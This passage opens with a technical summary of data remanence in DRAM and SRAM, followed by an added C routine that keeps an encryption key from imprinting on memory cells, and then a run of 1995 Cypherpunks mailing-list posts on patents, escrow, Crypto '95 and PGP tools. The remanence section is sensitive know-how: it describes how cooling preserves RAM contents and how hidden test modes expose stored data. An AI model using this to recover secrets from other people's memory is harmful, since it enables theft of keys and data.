Other factors which affect the rate of change are temperature, the field strength of the stored charge, the quality of the oxide, and the concentration of dopants and other impurities which have already been mentioned above. The stress on the cell is a cumulative effect, much like charging an RC circuit. If the data is applied for only a few milliseconds then there is very little "learning" of the cell, but if it is applied for hours then the cell will acquire a strong (relatively speaking) change in its threshold.

The effects of the stress on the RAM cells can be measured using the built-in self test capabilities of the cells, which provide the ability to impress a weak voltage on the storage cell in order to measure its margin.
Cells will show different margins depending on how much oxide stress has been present. Many DRAM's have undocumented test modes which allow some normal I/O pin to become the power supply for the RAM core when the special mode is active. One way to activate the special test mode might be to underdrive a pin and turn on its protection diode(s), which will be recognized internally and will change a multiplexer so that the core is powered by some pin which is normally a digital I/O pin. Another way, if the DRAM has suitable clocks, is to recognise an invalid combination of clocks (such as CAS before RAS, if the DRAM doesn't use that mode for higher speed operation) to enable the test mode. Great care must be taken to ensure that the test mode isn't inadvertently entered so that the memory system appears to be malfunctioning (for example in the first case if the system has substantial undershoot at the wrong time, the test mode could be activated). This problem can be avoided by designing the test mode signals such that a certain set of states which would not occur in a normally-functioning system has to be traversed to activate the mode.

Manufacturers won't admit to such capabilities in their products because they don't want their customers using them and potentially rejecting devices which comply with their spec sheets, but have little margin beyond that.

One way to speed up the annihilation of stored bits in semiconductor memory is to heat it. Both DRAM's and SRAM's will lose their contents a lot more quickly at Tjunction = 140C than they will at room temperature. Several hours at that temperature with no power applied will clear their contents sufficiently to make recovery difficult. Conversely, to extend the life of stored bits with the power removed, drop the temperature below -60C (some people even claim that you can permanently "imprint" an SRAM with its stored bits by rapidly cooling it below liquid nitrogen's boiling point).
In any case it should lead to weeks, instead of hours or days, of data "retention". Simply repeatedly overwriting the data held in DRAM with new data isn't nearly as effective as it is for magnetic media. The new data will begin stressing or relaxing the oxide as soon as it is written, and the oxide will immediately begin to take a "set" which will either reinforce the previous "set" or will weaken it. The greater the amount of time that new data has existed in the cell, the more the old stress is "diluted", and the less reliable the information extraction will be. Generally, the rates of change due to stress and relaxation are in the same order of magnitude. Thus, a few microseconds of storing the opposite data to the currently stored value will have little effect on the oxide. Ideally, the oxide should be exposed to as much stress at the highest feasible temperature and for as long as possible to get the greatest "erasure" of the data. Unfortunately if carried too far this has a rather detrimental effect on the life expectancy of the RAM. Therefore the goal to aim for when sanitising memory is to store the data for as long as possible rather than trying to change it as often as possible. Conversely, storing the data for as short a time as possible will reduce the chances of it being "remembered" by the cell. Based on tests on DRAM cells, a storage time of one second causes such a small change in threshold that it probably isn't detectable. On the other hand, one minute probably is detectable, and 10 minutes is certainly detectable. The most practical solution to the problem of DRAM data retention is therefore to constantly flip the bits in memory to ensure that a memory cell never holds a charge long enough for it to be "remembered". While not practical for general use, it is possible to do this for small amounts of data such as encryption keys. 
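The constant bit-flipping the summary ends with, as an added example that is not part of Peter Gutmann's summary: the key is stored beside its complement and both buffers are inverted in place on every tick, so each cell holds a 0 for half its life and a 1 for the other half whatever the key's value. KEY_LEN, flipping_key and the fk_* names are assumptions; a real implementation drives fk_tick from a timer well under the one-second threshold quoted above and also keeps the buffers out of swap.

```c
#include <stdint.h>
#include <stddef.h>

/* Added example, not from the summary above.  Keep a secret so that no RAM
 * cell holds the same bit for long: the key is stored next to its complement
 * and both buffers are inverted in place on every tick, so every cell spends
 * half its life at 0 and half at 1 whatever the key's value.  KEY_LEN and the
 * fk_* names are hypothetical.  A real implementation drives fk_tick from a
 * timer well under the summary's one-second "learning" threshold, keeps the
 * buffers out of swap, and reads the key out only for the moment it is used. */

#define KEY_LEN 32

typedef struct {
    volatile uint8_t a[KEY_LEN];   /* the key or its complement ... */
    volatile uint8_t b[KEY_LEN];   /* ... and always the other one */
    unsigned ticks;                /* parity says which buffer holds the key */
} flipping_key;

void fk_init(flipping_key *fk, const uint8_t key[KEY_LEN]) {
    for (size_t i = 0; i < KEY_LEN; i++) {
        fk->a[i] = key[i];
        fk->b[i] = (uint8_t)~key[i];
    }
    fk->ticks = 0;
}

/* Invert both buffers.  volatile keeps the compiler from dropping stores it
 * would otherwise consider dead or from caching the values in registers. */
void fk_tick(flipping_key *fk) {
    for (size_t i = 0; i < KEY_LEN; i++) {
        fk->a[i] = (uint8_t)~fk->a[i];
        fk->b[i] = (uint8_t)~fk->b[i];
    }
    fk->ticks++;
}

/* Reconstruct the key into caller memory, which should itself be short-lived. */
void fk_get(const flipping_key *fk, uint8_t out[KEY_LEN]) {
    const volatile uint8_t *src = (fk->ticks & 1) ? fk->b : fk->a;
    for (size_t i = 0; i < KEY_LEN; i++) out[i] = src[i];
}

/* Invariant check: the two buffers are complements of each other. */
int fk_consistent(const flipping_key *fk) {
    for (size_t i = 0; i < KEY_LEN; i++)
        if ((uint8_t)(fk->a[i] ^ fk->b[i]) != 0xFF) return 0;
    return 1;
}

/* Release: zero both buffers through the volatile members so the stores survive. */
void fk_wipe(flipping_key *fk) {
    for (size_t i = 0; i < KEY_LEN; i++) { fk->a[i] = 0; fk->b[i] = 0; }
    fk->ticks = 0;
}
```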
From adept at minerva.cis.yale.edu Sat Sep 2 18:32:55 1995 From: adept at minerva.cis.yale.edu (Ben) Date: Sat, 2 Sep 95 18:32:55 PDT Subject: Basic Public key algorithms. In-Reply-To: <199509021813.OAA29335@frankenstein.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 2 Sep 1995, Perry E. Metzger wrote: > > Daniel R. Oelke writes: > > I could use RSA (which is well described in many sources, and has > > RSAREF out there), but I want to avoid the patent issue if possible. > > The sci.crypt FAQ mentions that there are other methods but that > > is about all it says. Are there any that are not patented? > > No, because one patent covers public key cryptography itself, and not > a particular method. Point of information--I'm not flaming you Perry, but Public Key Partners claims that their patent covers all forms of Public Key Crypto. Phoeeey. Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMEjwWb5ALmeTVXAJAQGW2wL/RAfqyRrNoUeYDBkQKSsDhasM/xGSF3R/ JHvJyaFHr04Z+8KydRXxt+fU54JH01webbiol1EmH9ZvOdc175VRVBSg5+EiykzM 1bdW6dZXejeHHVelI343mOv0+Y0fDeiT =FPqc -----END PGP SIGNATURE----- From samman-ben at CS.YALE.EDU Sat Sep 2 18:58:20 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Sat, 2 Sep 95 18:58:20 PDT Subject: Basic Public key algorithms. In-Reply-To: <199509030031.UAA29612@frankenstein.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 2 Sep 1995, Perry E. Metzger wrote: > > > No, because one patent covers public key cryptography itself, and not > > > a particular method. > > > > Point of information--I'm not flaming you Perry, but Public Key Partners > > claims that their patent covers all forms of Public Key Crypto. > > How is this at all different from what I just said? It isn't. I just misread what you wrote. Mea culpa. Ben. 
____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf PGP encrypted mail welcomed--finger samman at cs.yale.edu for public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMEkLmL5ALmeTVXAJAQHotAL/bW9tN3Lf+9ATx8ks0s8kz8O3zTikverx y9bJfsQRaoDtJkNmeiFPBSCIl9q27OIdpN4tyExmFztJVgEdxRYcqZ19ZcXVDRpI B//GwQQ45JXl1ZKurT0cr2poIecCAFuE =/0J/ -----END PGP SIGNATURE----- From edge at got.net Sat Sep 2 19:41:49 1995 From: edge at got.net (Jay Campbell) Date: Sat, 2 Sep 95 19:41:49 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations In-Reply-To: Message-ID: On 2 Sep 1995, Dar Scott wrote: > >I finished my first release, a megabyte-sized file done in MORE, a powerful > >outline processor (which enabled me to maintain notes, make > >cross-references, and generally manage such a huge writing project). I > >released it last year, and put it in my anonymous ftp account at > >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom > >is often very crowded, though. > > After several tries I was not able to get this. Has anyone made it > available in an alternate location? Tim mentioned that we're planning on spiffing up the cypherpunks web site (including using a real web server) and the cyphernomicon is an obvious candidate for inclusion - depending on how many people help out, the new site (a quasi-mirror at first, till we get sameer/et al's go-ahead) should be live within a couple weeks. If you're interested in gathering documents, hacking HTML, or anything else involved in creating/maintaining a web hierarchy, drop me a line. 
The space/delivery of the documents we're providing for free, but I don't have a budget to hire a staff to do things the "right way" (my way :) for this project. -- Jay Campbell - Regional Operations Manager -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net "Shoot the Fruit Loop" 408.469.9400

From monty.harder at famend.com Sat Sep 2 20:43:40 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 2 Sep 95 20:43:40 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <8B05513.00030003DB.uuout@famend.com>

BS> For the problem that started this discussion, though, there's no good solution. BS> Since the Bad Guys _can_ encrypt a message to you with your signature key, BS> and send it to you by anonymous remailer, they can plant a reason to suspect BS> that you may have evidence encrypted with that key. You've got it backwards. The problem that I originally posited was a corrupt key escrow agent using my signature key to forge a document. The fact that my signature pubkey could be used to encrypt messages to me is not particularly relevant. My employer could set up filters to keep me from receiving email on company time that is not encrypted to a key that the corporate escrow authority has in its possession. NBD. My concern here is with the NGACK situation. Companies have valid reasons to want escrow for their own purposes. I'm just warning people not to accept a signature key being escrowed by =anyone=. When you create a key to be escrowed, make sure the userid includes something like [Not Valid For Signatures]. * Pro Choice on Abortion. * No choice on Education. * Huh? --- * Monster at FAmend.Com *

From monty.harder at famend.com Sat Sep 2 20:43:42 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 2 Sep 95 20:43:42 PDT Subject: A problem with anonymity Message-ID: <8B05513.00030003DC.uuout@famend.com>

TC> Oh, I agree, of course.
Except that the escrow agent need not be a TC> "nonymous" agent, to use Monty's terminology here. Sorry, my Greek is rusty. Shoulda been "onymous", I suppose. But if the escrow agent is anonymous, we simply recurse, moving now to the question of whether anyone can trust the Anonymous Escrow Agency not to take the money and run. TC> (I mention banks because, when you look at it closely, today's banks can TC> quite easily claim that a customer made a withdrawal when he didn't. That TC> they don't says more about the nature of persistent businesses than about TC> any government oversight or security features. This is a side point, but it TC> bears keeping in mind that the real world of banks and businesses, etc., is TC> not fully secure, either. And yet it mostly works pretty well. The reasons TC> for this are interesting to consider.) A bank has $$ invested in impressive-looking buildings, (so that vanishing into the ether and setting up shop elsewhere is rather difficult) and several officers whose TrueNames are registered with the appropriate agencies, so that they may be sued if they pull this crap. While individual stockholders might appreciate the anonymity (and protection from legal action) of owning stock in a bank or escrow agency (might just combine the functions, while we're at it), they demand onymity of the officers with whom they entrust the keys to the corporation. * --- * Monster at FAmend.Com * From tcmay at got.net Sat Sep 2 20:58:25 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Sep 95 20:58:25 PDT Subject: A problem with anonymity Message-ID: At 2:38 AM 9/3/95, MONTY HARDER wrote: > But if the escrow agent is anonymous, we simply recurse, moving now to >the question of whether anyone can trust the Anonymous Escrow Agency not >to take the money and run. Well, at one level, everything is always recursive. But seriously, the reason it differs is that the escrow agents are in the business to be escrow agents, not to take the money and run. 
This actually works in the real world. (Game-theoretically, they get a certain payoff in defecting, but then forego the revenue stream from future transactions....) And, of course, it is possible to structure things so that the escrow agent cannot "take the money and run," because the money is not accessible to them. This is analogous to an escrow agent in the real world holding a check from Alice to Bob until Bob completes some set of conditions. The escrow agent--call her Essie--cannot cash the check herself. She can of course renege on the deal, even if Bob does his part of the bargain, but there is little incentive for her to do so. One can ask what payoffs and costs/benefits exist for various actions by these agents, and game theory needs to take a look at these sorts of transactions, but there are plenty of reasons to believe "convergence" will occur (basically, that "effectively honest" behavior will be common). >TC> (I mention banks because, when you look at it closely, today's banks can >TC> quite easily claim that a customer made a withdrawal when he didn't. That >TC> they don't says more about the nature of persistent businesses than about >TC> any government oversight or security features. This is a side point, but it >TC> bears keeping in mind that the real world of banks and businesses, etc., is >TC> not fully secure, either. And yet it mostly works pretty well. The reasons >TC> for this are interesting to consider.) > > A bank has $$ invested in impressive-looking buildings, (so that >vanishing into the ether and setting up shop elsewhere is rather >difficult) and several officers whose TrueNames are registered with the >appropriate agencies, so that they may be sued if they pull this >crap. No, my point was that it is fairly easy for any bank to scam any particular customer, given the flaky nature of verification of withdrawals and other transactions (at least for smallish amounts of money). 
Few banks check signatures, few banks bother to demand much ID, etc. The issue is not whether you can sue Bank of America, but whether you could win. That banks don't often scam customers for small amounts of money is testimony to the fact that they've got a better payoff matrix element in being a bank than the meager payoff in scamming a few customers. I submit this not as proof, but as evidence that the type of "convergence" mentioned above mostly works. Most commerce hinges on this, not because of law enforcement. Like True Names, the threat of law enforcement is only a part of the overall equation. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jim at acm.org Sat Sep 2 21:35:08 1995 From: jim at acm.org (Jim Gillogly) Date: Sat, 2 Sep 95 21:35:08 PDT Subject: Crypto '95: Robert Morris Message-ID: <199509030434.VAA24841@mycroft.rand.org> Bob Morris (recently retired from NSA) gave a fascinating invited lecture entitled "Non-cryptographic Ways of Losing Information". I hope he writes it up; until then, here are my notes from his presentation. Two things he said which I found new and fascinating: - During the early 1950's many major powers were discouraged by the tendency of then-modern crypto machines to fail in a way that would send plaintext instead of ciphertext, and they went to one time pads for most of their high-level enciphered traffic. Because of key re-use, we were regularly and routinely reading pieces of that traffic -- not just VENONA, but many systems from various countries. 
Sometimes the people who prepared OTP's would double their profit by selling them to more than one customer. - By the middle to late 1960's cryptanalysis became less cost effective than obtaining the information by other means -- wiretaps and so on. Morris emphasized and said we should write down these dicta: ------------------------------------------------------------------------- Never underestimate the attention, risk, money and time that an opponent will put into reading traffic. Rule 1 of cryptanalysis: check for plaintext. ------------------------------------------------------------------------- The real start of modern cryptology should be dated to the Enigma machines, which typified the new character of the art. Much has been made of the errors of the German cipher clerks, but egregious as they were, the errors made by the British cryptographers were vastly worse, and the American blunders were worse yet. German analysts regularly read and used Atlantic convoy orders throughout the war -- they were transmitted in an old code. One must always assume that the enemy has a copy of the machine/algorithm. A system that relies on keeping the algorithm secret is eventually doomed to failure, because it will always be discovered by some means or other. He sees microphones and antennas everywhere: the telephone line cord is an antenna; if telephone linemen were working on a pole outside his house he'd call the police and then find out what they were working on. In an unspecified country he called Lower Slobbovia (Al Capp, isn't it?) American troops used encrypted radiophones; when they broke they were taken to local repair shops to be fixed. When they got home the US engineers were interested to see the modifications that had been made. He mentioned a few similar instances, including the lovely carved wooden seal given to the US Embassy in Moscow to decorate their anteroom. [It's now on view at the National Cryptologic Museum with the transmitter cavity visible.]
Cordless phones have a range of 5 miles or so. Use of cellular phones is increasing dramatically, as well as fax and modems. He discussed the Walker/Whitworth spying case, and said one of his design criteria is to design systems with Walker in them: it's not good enough to have a system where everyone must be trusted, but it must also be made robust against insiders. This may include going to non-paper systems, so that there are no paper keys that the Walkers of the world can shop to the other side. Threats and risks include: overconfidence, carelessness, eavesdropping and tapping, theft of floppies and other materials, purchase, theft of key material, burglary and blackmail. Much or most loss is due to insiders. In the future there will be more radio used for ordinary communications. Americans are unwilling to pay for secure telephones, but that's not the case in Europe. ------------------------------------------------------------------------- Reported by: Jim Gillogly 12 Halimath S.R. 1995, 04:33 From dsc at swcp.com Sat Sep 2 22:00:36 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 22:00:36 PDT Subject: Cyphernomicon Message-ID: Thanks to all who helped me get my hands on Cyphernomicon. I now can breeze through the html site at www.oberlin.edu. I guess at 2am it didn't work because either I or oberlin were too sleepy. I still cannot open an FTP port at netcom. I got a copy on my Mac by giving a lot of memory to Netscape and getting it from www.swiss.ai.mit.edu. I also got a copy from Jeff's zipped copy at ftp.goblin.punk.net, but my unzipping utility hacked out a few lines. Here is a summary of what I learned: Cyphernomicon File Size: 1,287,731 (single character newlines) FTP sites: ftp.netcom.com/pub/tc/tcmay/CP-FAQ The original. "crowded" (I couldn't open an FTP port.) ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz ftp.goblin.punk.net/pub/docs/cypherfq.zip 28.8 bps modem, newline=CR, but .zip will change to newline=CRLF About 432Kbytes. 
    (On PPP at 14.4 it took me 6+ minutes to get it.)
    "until someone posts it on a site with higher bandwidth"
    [the upcoming new/changed/mirrored Cypherpunk site]

HTML site:
http://www.oberlin.edu/~brchkind/cyphernomicon/
    nice.

Other http: sites:
http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
    text. very responsive and fast (6 minutes for my 14.4 connection).
http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
    text
http://www.msen.com/~lwp/Cyphernomicon.gz
    About 432Kbytes. Need g[un]zip utility.

Clearly missing are credits and contact info.

I probably won't get to the FAQ much this weekend (wife & kids expect me to do my share and bring home the bacon), but maybe in a week or two.

Do I have to read the sci.crypt FAQ, too, to earn my FAQ badge?

Dar (list newbie)

===========================================================
Dar Scott                     Home phone: +1 505 299 9497
Dar Scott Consulting          Voice:      +1 505 299 5790 <---
8637 Horacio Place NE         Email:      darscott at aol.com
Albuquerque, NM 87111                     dsc at swcp.com
                              Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode
===========================================================

From lwp at mail.msen.com Sat Sep 2 22:06:01 1995
From: lwp at mail.msen.com (Lou Poppler)
Date: Sat, 2 Sep 95 22:06:01 PDT
Subject: Cyphernomicon, and a section on Escrow and Reputations
In-Reply-To:
Message-ID:

Also available at http://www.msen.com/~lwp/Cyphernomicon.gz

On Fri, 1 Sep 1995, Timothy C. May wrote:
> released it last year, and put it in my anonymous ftp account at
> ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
> is often very crowded, though.
>
> I know of a couple of alternative places.
> A very nice job of HTMLizing it
> was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL
>
> http://www.oberlin.edu/~brchkind/cyphernomicon/
>
> Another URL, which is just one large file, is
>
> http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler                 :: No animals were harmed in the
:: http://www.msen.com/~lwp/   :: production of this message.
::::::::::::::::::::::::::::::::::::::

From dsc at swcp.com Sat Sep 2 22:49:23 1995
From: dsc at swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 22:49:23 PDT
Subject: A problem with anonymity
Message-ID:

Having not read the FAQ, I foolishly jump in...

Timothy May wrote,
>At 2:38 AM 9/3/95, MONTY HARDER wrote:
>
>> But if the escrow agent is anonymous, we simply recurse, moving now to
>>the question of whether anyone can trust the Anonymous Escrow Agency not
>>to take the money and run.
>
>Well, at one level, everything is always recursive.
[snip]
>And, of course, it is possible to structure things so that the escrow agent
>cannot "take the money and run," because the money is not accessible to
>them.
>
>This is analogous to an escrow agent in the real world holding a check from
>Alice to Bob until Bob completes some set of conditions. The escrow
>agent--call her Essie--cannot cash the check herself. She can of course
>renege on the deal, even if Bob does his part of the bargain, but there is
>little incentive for her to do so.

For example, the money exchanger or bank can allow an exchange option that packages up the new money for some AND/OR list of package openers, certify what it is and then seal it up & send it to the escrow agent.

As mentioned by Timothy and Monty this just pushes the question down to whether anyone can trust the bank. Timothy claims evidence that there will be entities such as banks that do not scam customers. I observe that from a few trusted entities a great amount of trust can be created--bubbling up that same recursion.
In the above example, the trust of the Anonymous Escrow Agency is increased by the mechanism that does not allow the agency to get at the cash. This uses the trust of the bank, but does not decrease the trust of the bank.

Perhaps trust formal transfer mechanisms can evolve so that almost everybody can become almost as trustworthy as the most trustworthy entity in the commerce.

Dar (who knows he should have checked the FAQ)

===========================================================
Dar Scott                     Home phone: +1 505 299 9497
Dar Scott Consulting          Voice:      +1 505 299 5790 <---
8637 Horacio Place NE         Email:      darscott at aol.com
Albuquerque, NM 87111                     dsc at swcp.com
                              Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode
===========================================================

From edge at got.net Sun Sep 3 00:06:05 1995
From: edge at got.net (Jay Campbell)
Date: Sun, 3 Sep 95 00:06:05 PDT
Subject: Mailing List Archive
Message-ID:

For personal reasons (my dislike for big mailboxes) I've set up hypermail to archive the Cypherpunks list at:

http://got.net/CypherpunksArchive/

If someone else has done this, I'll stop fiddling with the configs and come use yours. I just set it up, so it's rather empty today...

If someone has a non-html archive of the messages, I'm up to tossing some perl around and converting it for the archive.

--
Jay Campbell - Regional Operations Manager
-=-=-=-=-=-=- Sense Networking (Santa Cruz Node)
edge at you.got.net    "Shoot the Fruit Loop"    408.469.9400

From perry at piermont.com Sun Sep 3 00:14:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 3 Sep 95 00:14:55 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To:
Message-ID: <199509021658.MAA29224@frankenstein.piermont.com>

Alan Westrope writes:
> On Fri, 01 Sep 1995, Michael Froomkin wrote:
>
> > I think he would have to be charged first. Have I missed something?
> > PS when does the statute of limitations run out?
>
> June '96. Zimmermann and Dubois appeared on a local talk radio show
> recently; a friend happened to catch the program, taped it, and played
> excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois.

That's not possible. The offense in question took place on or before September 8, 1992, and the statute of limitations is, to my knowledge, three years. Even if it were four years, it would have to be September 8th of that year.

Branko Lankester announced availability of PGP 2.0 on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that he exported PGP Version 1.0 to the team that developed PGP 2.0 overseas, any export that Phil performed would have of necessity to have taken place before then.

Michael, you are one of our local lawyers. Could you please confirm the length of the statute of limitations?

Perry

From edge at got.net Sun Sep 3 00:18:05 1995
From: edge at got.net (Jay Campbell)
Date: Sun, 3 Sep 95 00:18:05 PDT
Subject: Mailing List Archive
In-Reply-To:
Message-ID:

On Sun, 3 Sep 1995, Jay Campbell wrote:
> For personal reasons (my dislike for big mailboxes) I've set up
> hypermail to archive the Cypherpunks list at:
>
> http://got.net/CypherpunksArchive/

Oops - the real (but temporary) URL is actually:

http://got.net:8080/CypherpunksArchive/

--
Jay Campbell - Regional Operations Manager
-=-=-=-=-=-=- Sense Networking (Santa Cruz Node)
edge at you.got.net    "Shoot the Fruit Loop"    408.469.9400

From mark at unicorn.com Sun Sep 3 00:34:22 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Sun, 3 Sep 95 00:34:22 PDT
Subject: Dumb Question: PGPfone over Appletalk
Message-ID:

Can someone tell me how to run PGPfone over Appletalk ? The documentation says that support has been added for this release, and there's a preferences box to check to use it, but there's no information I can find in the documentation on how to initiate a call over Appletalk..
it just says to enter a telephone number to dial. If I press 'Connect' without entering anything it hangs up the Mac. How do I tell it which machine I want to connect to ?

Mark "Don't know much about Macs" Grant

From droelke at rdxsunhost.aud.alcatel.com Sun Sep 3 00:34:28 1995
From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sun, 3 Sep 95 00:34:28 PDT
Subject: Basic Public key algorithms.
Message-ID: <9509021801.AA07301@spirit.aud.alcatel.com>

After doing quite a bit of poking around, I am somewhat discouraged in my attempts to find a simple *pure* public key encryption method, without a lot of other stuff wrapped around it.

What I need is to encrypt between 45 and 55 bits of information using a public key algorithm in an embedded environment. Memory usage needs to be minimal (a couple of K), and CPU usage will be traded off based on key length. Decryption speed/memory usage is not very limited (done on a workstation, not on embedded system).

I could use RSA (which is well described in many sources, and has RSAREF out there), but I want to avoid the patent issue if possible. The sci.crypt FAQ mentions that there are other methods but that is about all it says. Are there any that are not patented? Are there any that someone knows of that work well in a limited memory environment?

Thanks for any/all pointers.

Dan
------------------------------------------------------------------
Dan Oelke                   Alcatel Network Systems
droelke at aud.alcatel.com    Richardson, TX

From perry at piermont.com Sun Sep 3 00:34:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 3 Sep 95 00:34:32 PDT
Subject: Basic Public key algorithms.
In-Reply-To: <9509021801.AA07301@spirit.aud.alcatel.com>
Message-ID: <199509021813.OAA29335@frankenstein.piermont.com>

Daniel R. Oelke writes:
> I could use RSA (which is well described in many sources, and has
> RSAREF out there), but I want to avoid the patent issue if possible.
> The sci.crypt FAQ mentions that there are other methods but that
> is about all it says. Are there any that are not patented?

No, because one patent covers public key cryptography itself, and not a particular method.

.pm

From jis at mit.edu Sun Sep 3 00:34:34 1995
From: jis at mit.edu (Jeffrey I. Schiller)
Date: Sun, 3 Sep 95 00:34:34 PDT
Subject: ASN.1 and Kerberos version 5
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in
>Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
>which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos version 5. I had this disease at the time that made me think that ASN.1 was a good idea. I got better, unfortunately we have been living with the results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually isn't that bad for a mechanism for encoding arbitrary objects). The problem is that it is the product of a standards making process that didn't (and doesn't) value interoperability. Adherence to the ISO specifications does not guarantee interoperation. Instead regional "workshops" negotiate aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a bit abstract (as its name implies). Problems result when two organizations (say MIT and OSF!) attempt to implement from the specification in ASN.1 but use different ASN.1 compilers and things then don't work. Arguments then ensue about whose compiler (or manually written parsing code) is "correct" in terms of doing the right thing with ASN.1. This is particularly so when using DER (for Distinguished Encoding Rules) which is itself an after-thought added to ASN.1 later in the process.
It is required in order to verify digital signatures (which have to be computed on the "encoded" form of an object because there is no good way to calculate a signature on an "abstract" object).

If the Kerberos specification said: "put this byte here and that one there" none of these arguments and problems would happen.

-Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh
QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo
z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE
S9XPCgV8E1Q=
=kTyw
-----END PGP SIGNATURE-----

From ravage at einstein.ssz.com Sun Sep 3 00:34:37 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Sun, 3 Sep 95 00:34:37 PDT
Subject: Austin Cypherpunks
Message-ID: <199509021825.NAA00547@einstein.ssz.com>

Hi all,

This is of real interest to Austin subscribers only...

It has been over a year since the last real meeting of the Austin Cypherpunks. I am interested in getting the group back on a regular schedule and writing code and building hardware. If you share this interest then please drop me a note at ravage at einstein.ssz.com

I have created a mailing list for the local members and if interested then send a subscribe austin-cpunks to list at einstein.ssz.com

That is all.

Jim Choate
CyberTects
ravage at einstein.ssz.com

From adam at bwh.harvard.edu Sun Sep 3 01:00:36 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sun, 3 Sep 95 01:00:36 PDT
Subject: Crypto '95
Message-ID: <199509021859.OAA02093@bwh.harvard.edu>

Perry asked for an overview of Crypto '95. I missed the rump session, so hopefully someone else will write about that.

The best talks were probably by Ross Anderson (Robustness Principles for Public Key Protocols) and Adi Shamir (Myths and Realities of Cryptography). Since Anderson's paper is in the proceedings, I won't rehash it here, but Shamir's talk is not, I present his 10 commandments of Commercial Security:

1. Don't aim for perfect security.
2. Don't solve the wrong problem.
3. Don't try to sell security bottom up.
4. Don't use cryptographic overkill.
5. Don't make it complicated.
6. Don't make it expensive.
7. Don't use a single line of defense.
8. Don't forget the mystery attack. (Know how to regenerate security when you don't know what's going wrong.)
9. Don't trust systems.
10. Don't trust people.

In other news:

Richard Schroeppel, Hilarie Orman (and others) presented some speedups to elliptic curve systems, based on fast calculation of reciprocals. The speedup is about a factor of 3.

There were some interesting analyses of RC5, SAFER-K64.

Bruce Dodson and Arjen Lenstra presented some interesting results running NFS with four large primes. From their abstract: "[factoring with 2 large primes] completion time can quite accurately be predicted...For NFS such extrapolations seem to be impossible--the number of useful combinations suddenly `explodes' in an as yet unpredictable way, that we have not yet been able to understand completely. The consequence of this is that NFS factoring is substantially faster than expected, which implies that factoring is somewhat easier than we thought."

Please note that that doesn't mean RSA has been broken, or that they can factor products of large primes in their heads. It means that there are speedups possible, but not enough that anyone should be worrying about a 1024 bit key.

The best quote of the conference was doubtless Robert Morris, Sr, reminding us of the first rule of cryptanalysis, "Don't forget to look for plaintext."

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From don at cs.byu.edu Sun Sep 3 01:43:06 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sun, 3 Sep 95 01:43:06 PDT
Subject: SSLRef (SSLtelnet)
Message-ID: <199509030845.CAA00124@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I have been looking at a number of SSLTelnet/FTP programs (available from utopia.hacktic.nl by the way) and they would seem to all require Netscape's library. Anyone know about this? I found the following link for SSLRef but I was just wondering if it was the only way to implement SSL telnet&ftp. I would hate to see people not be able to use them simply because there's no illegal copies available.

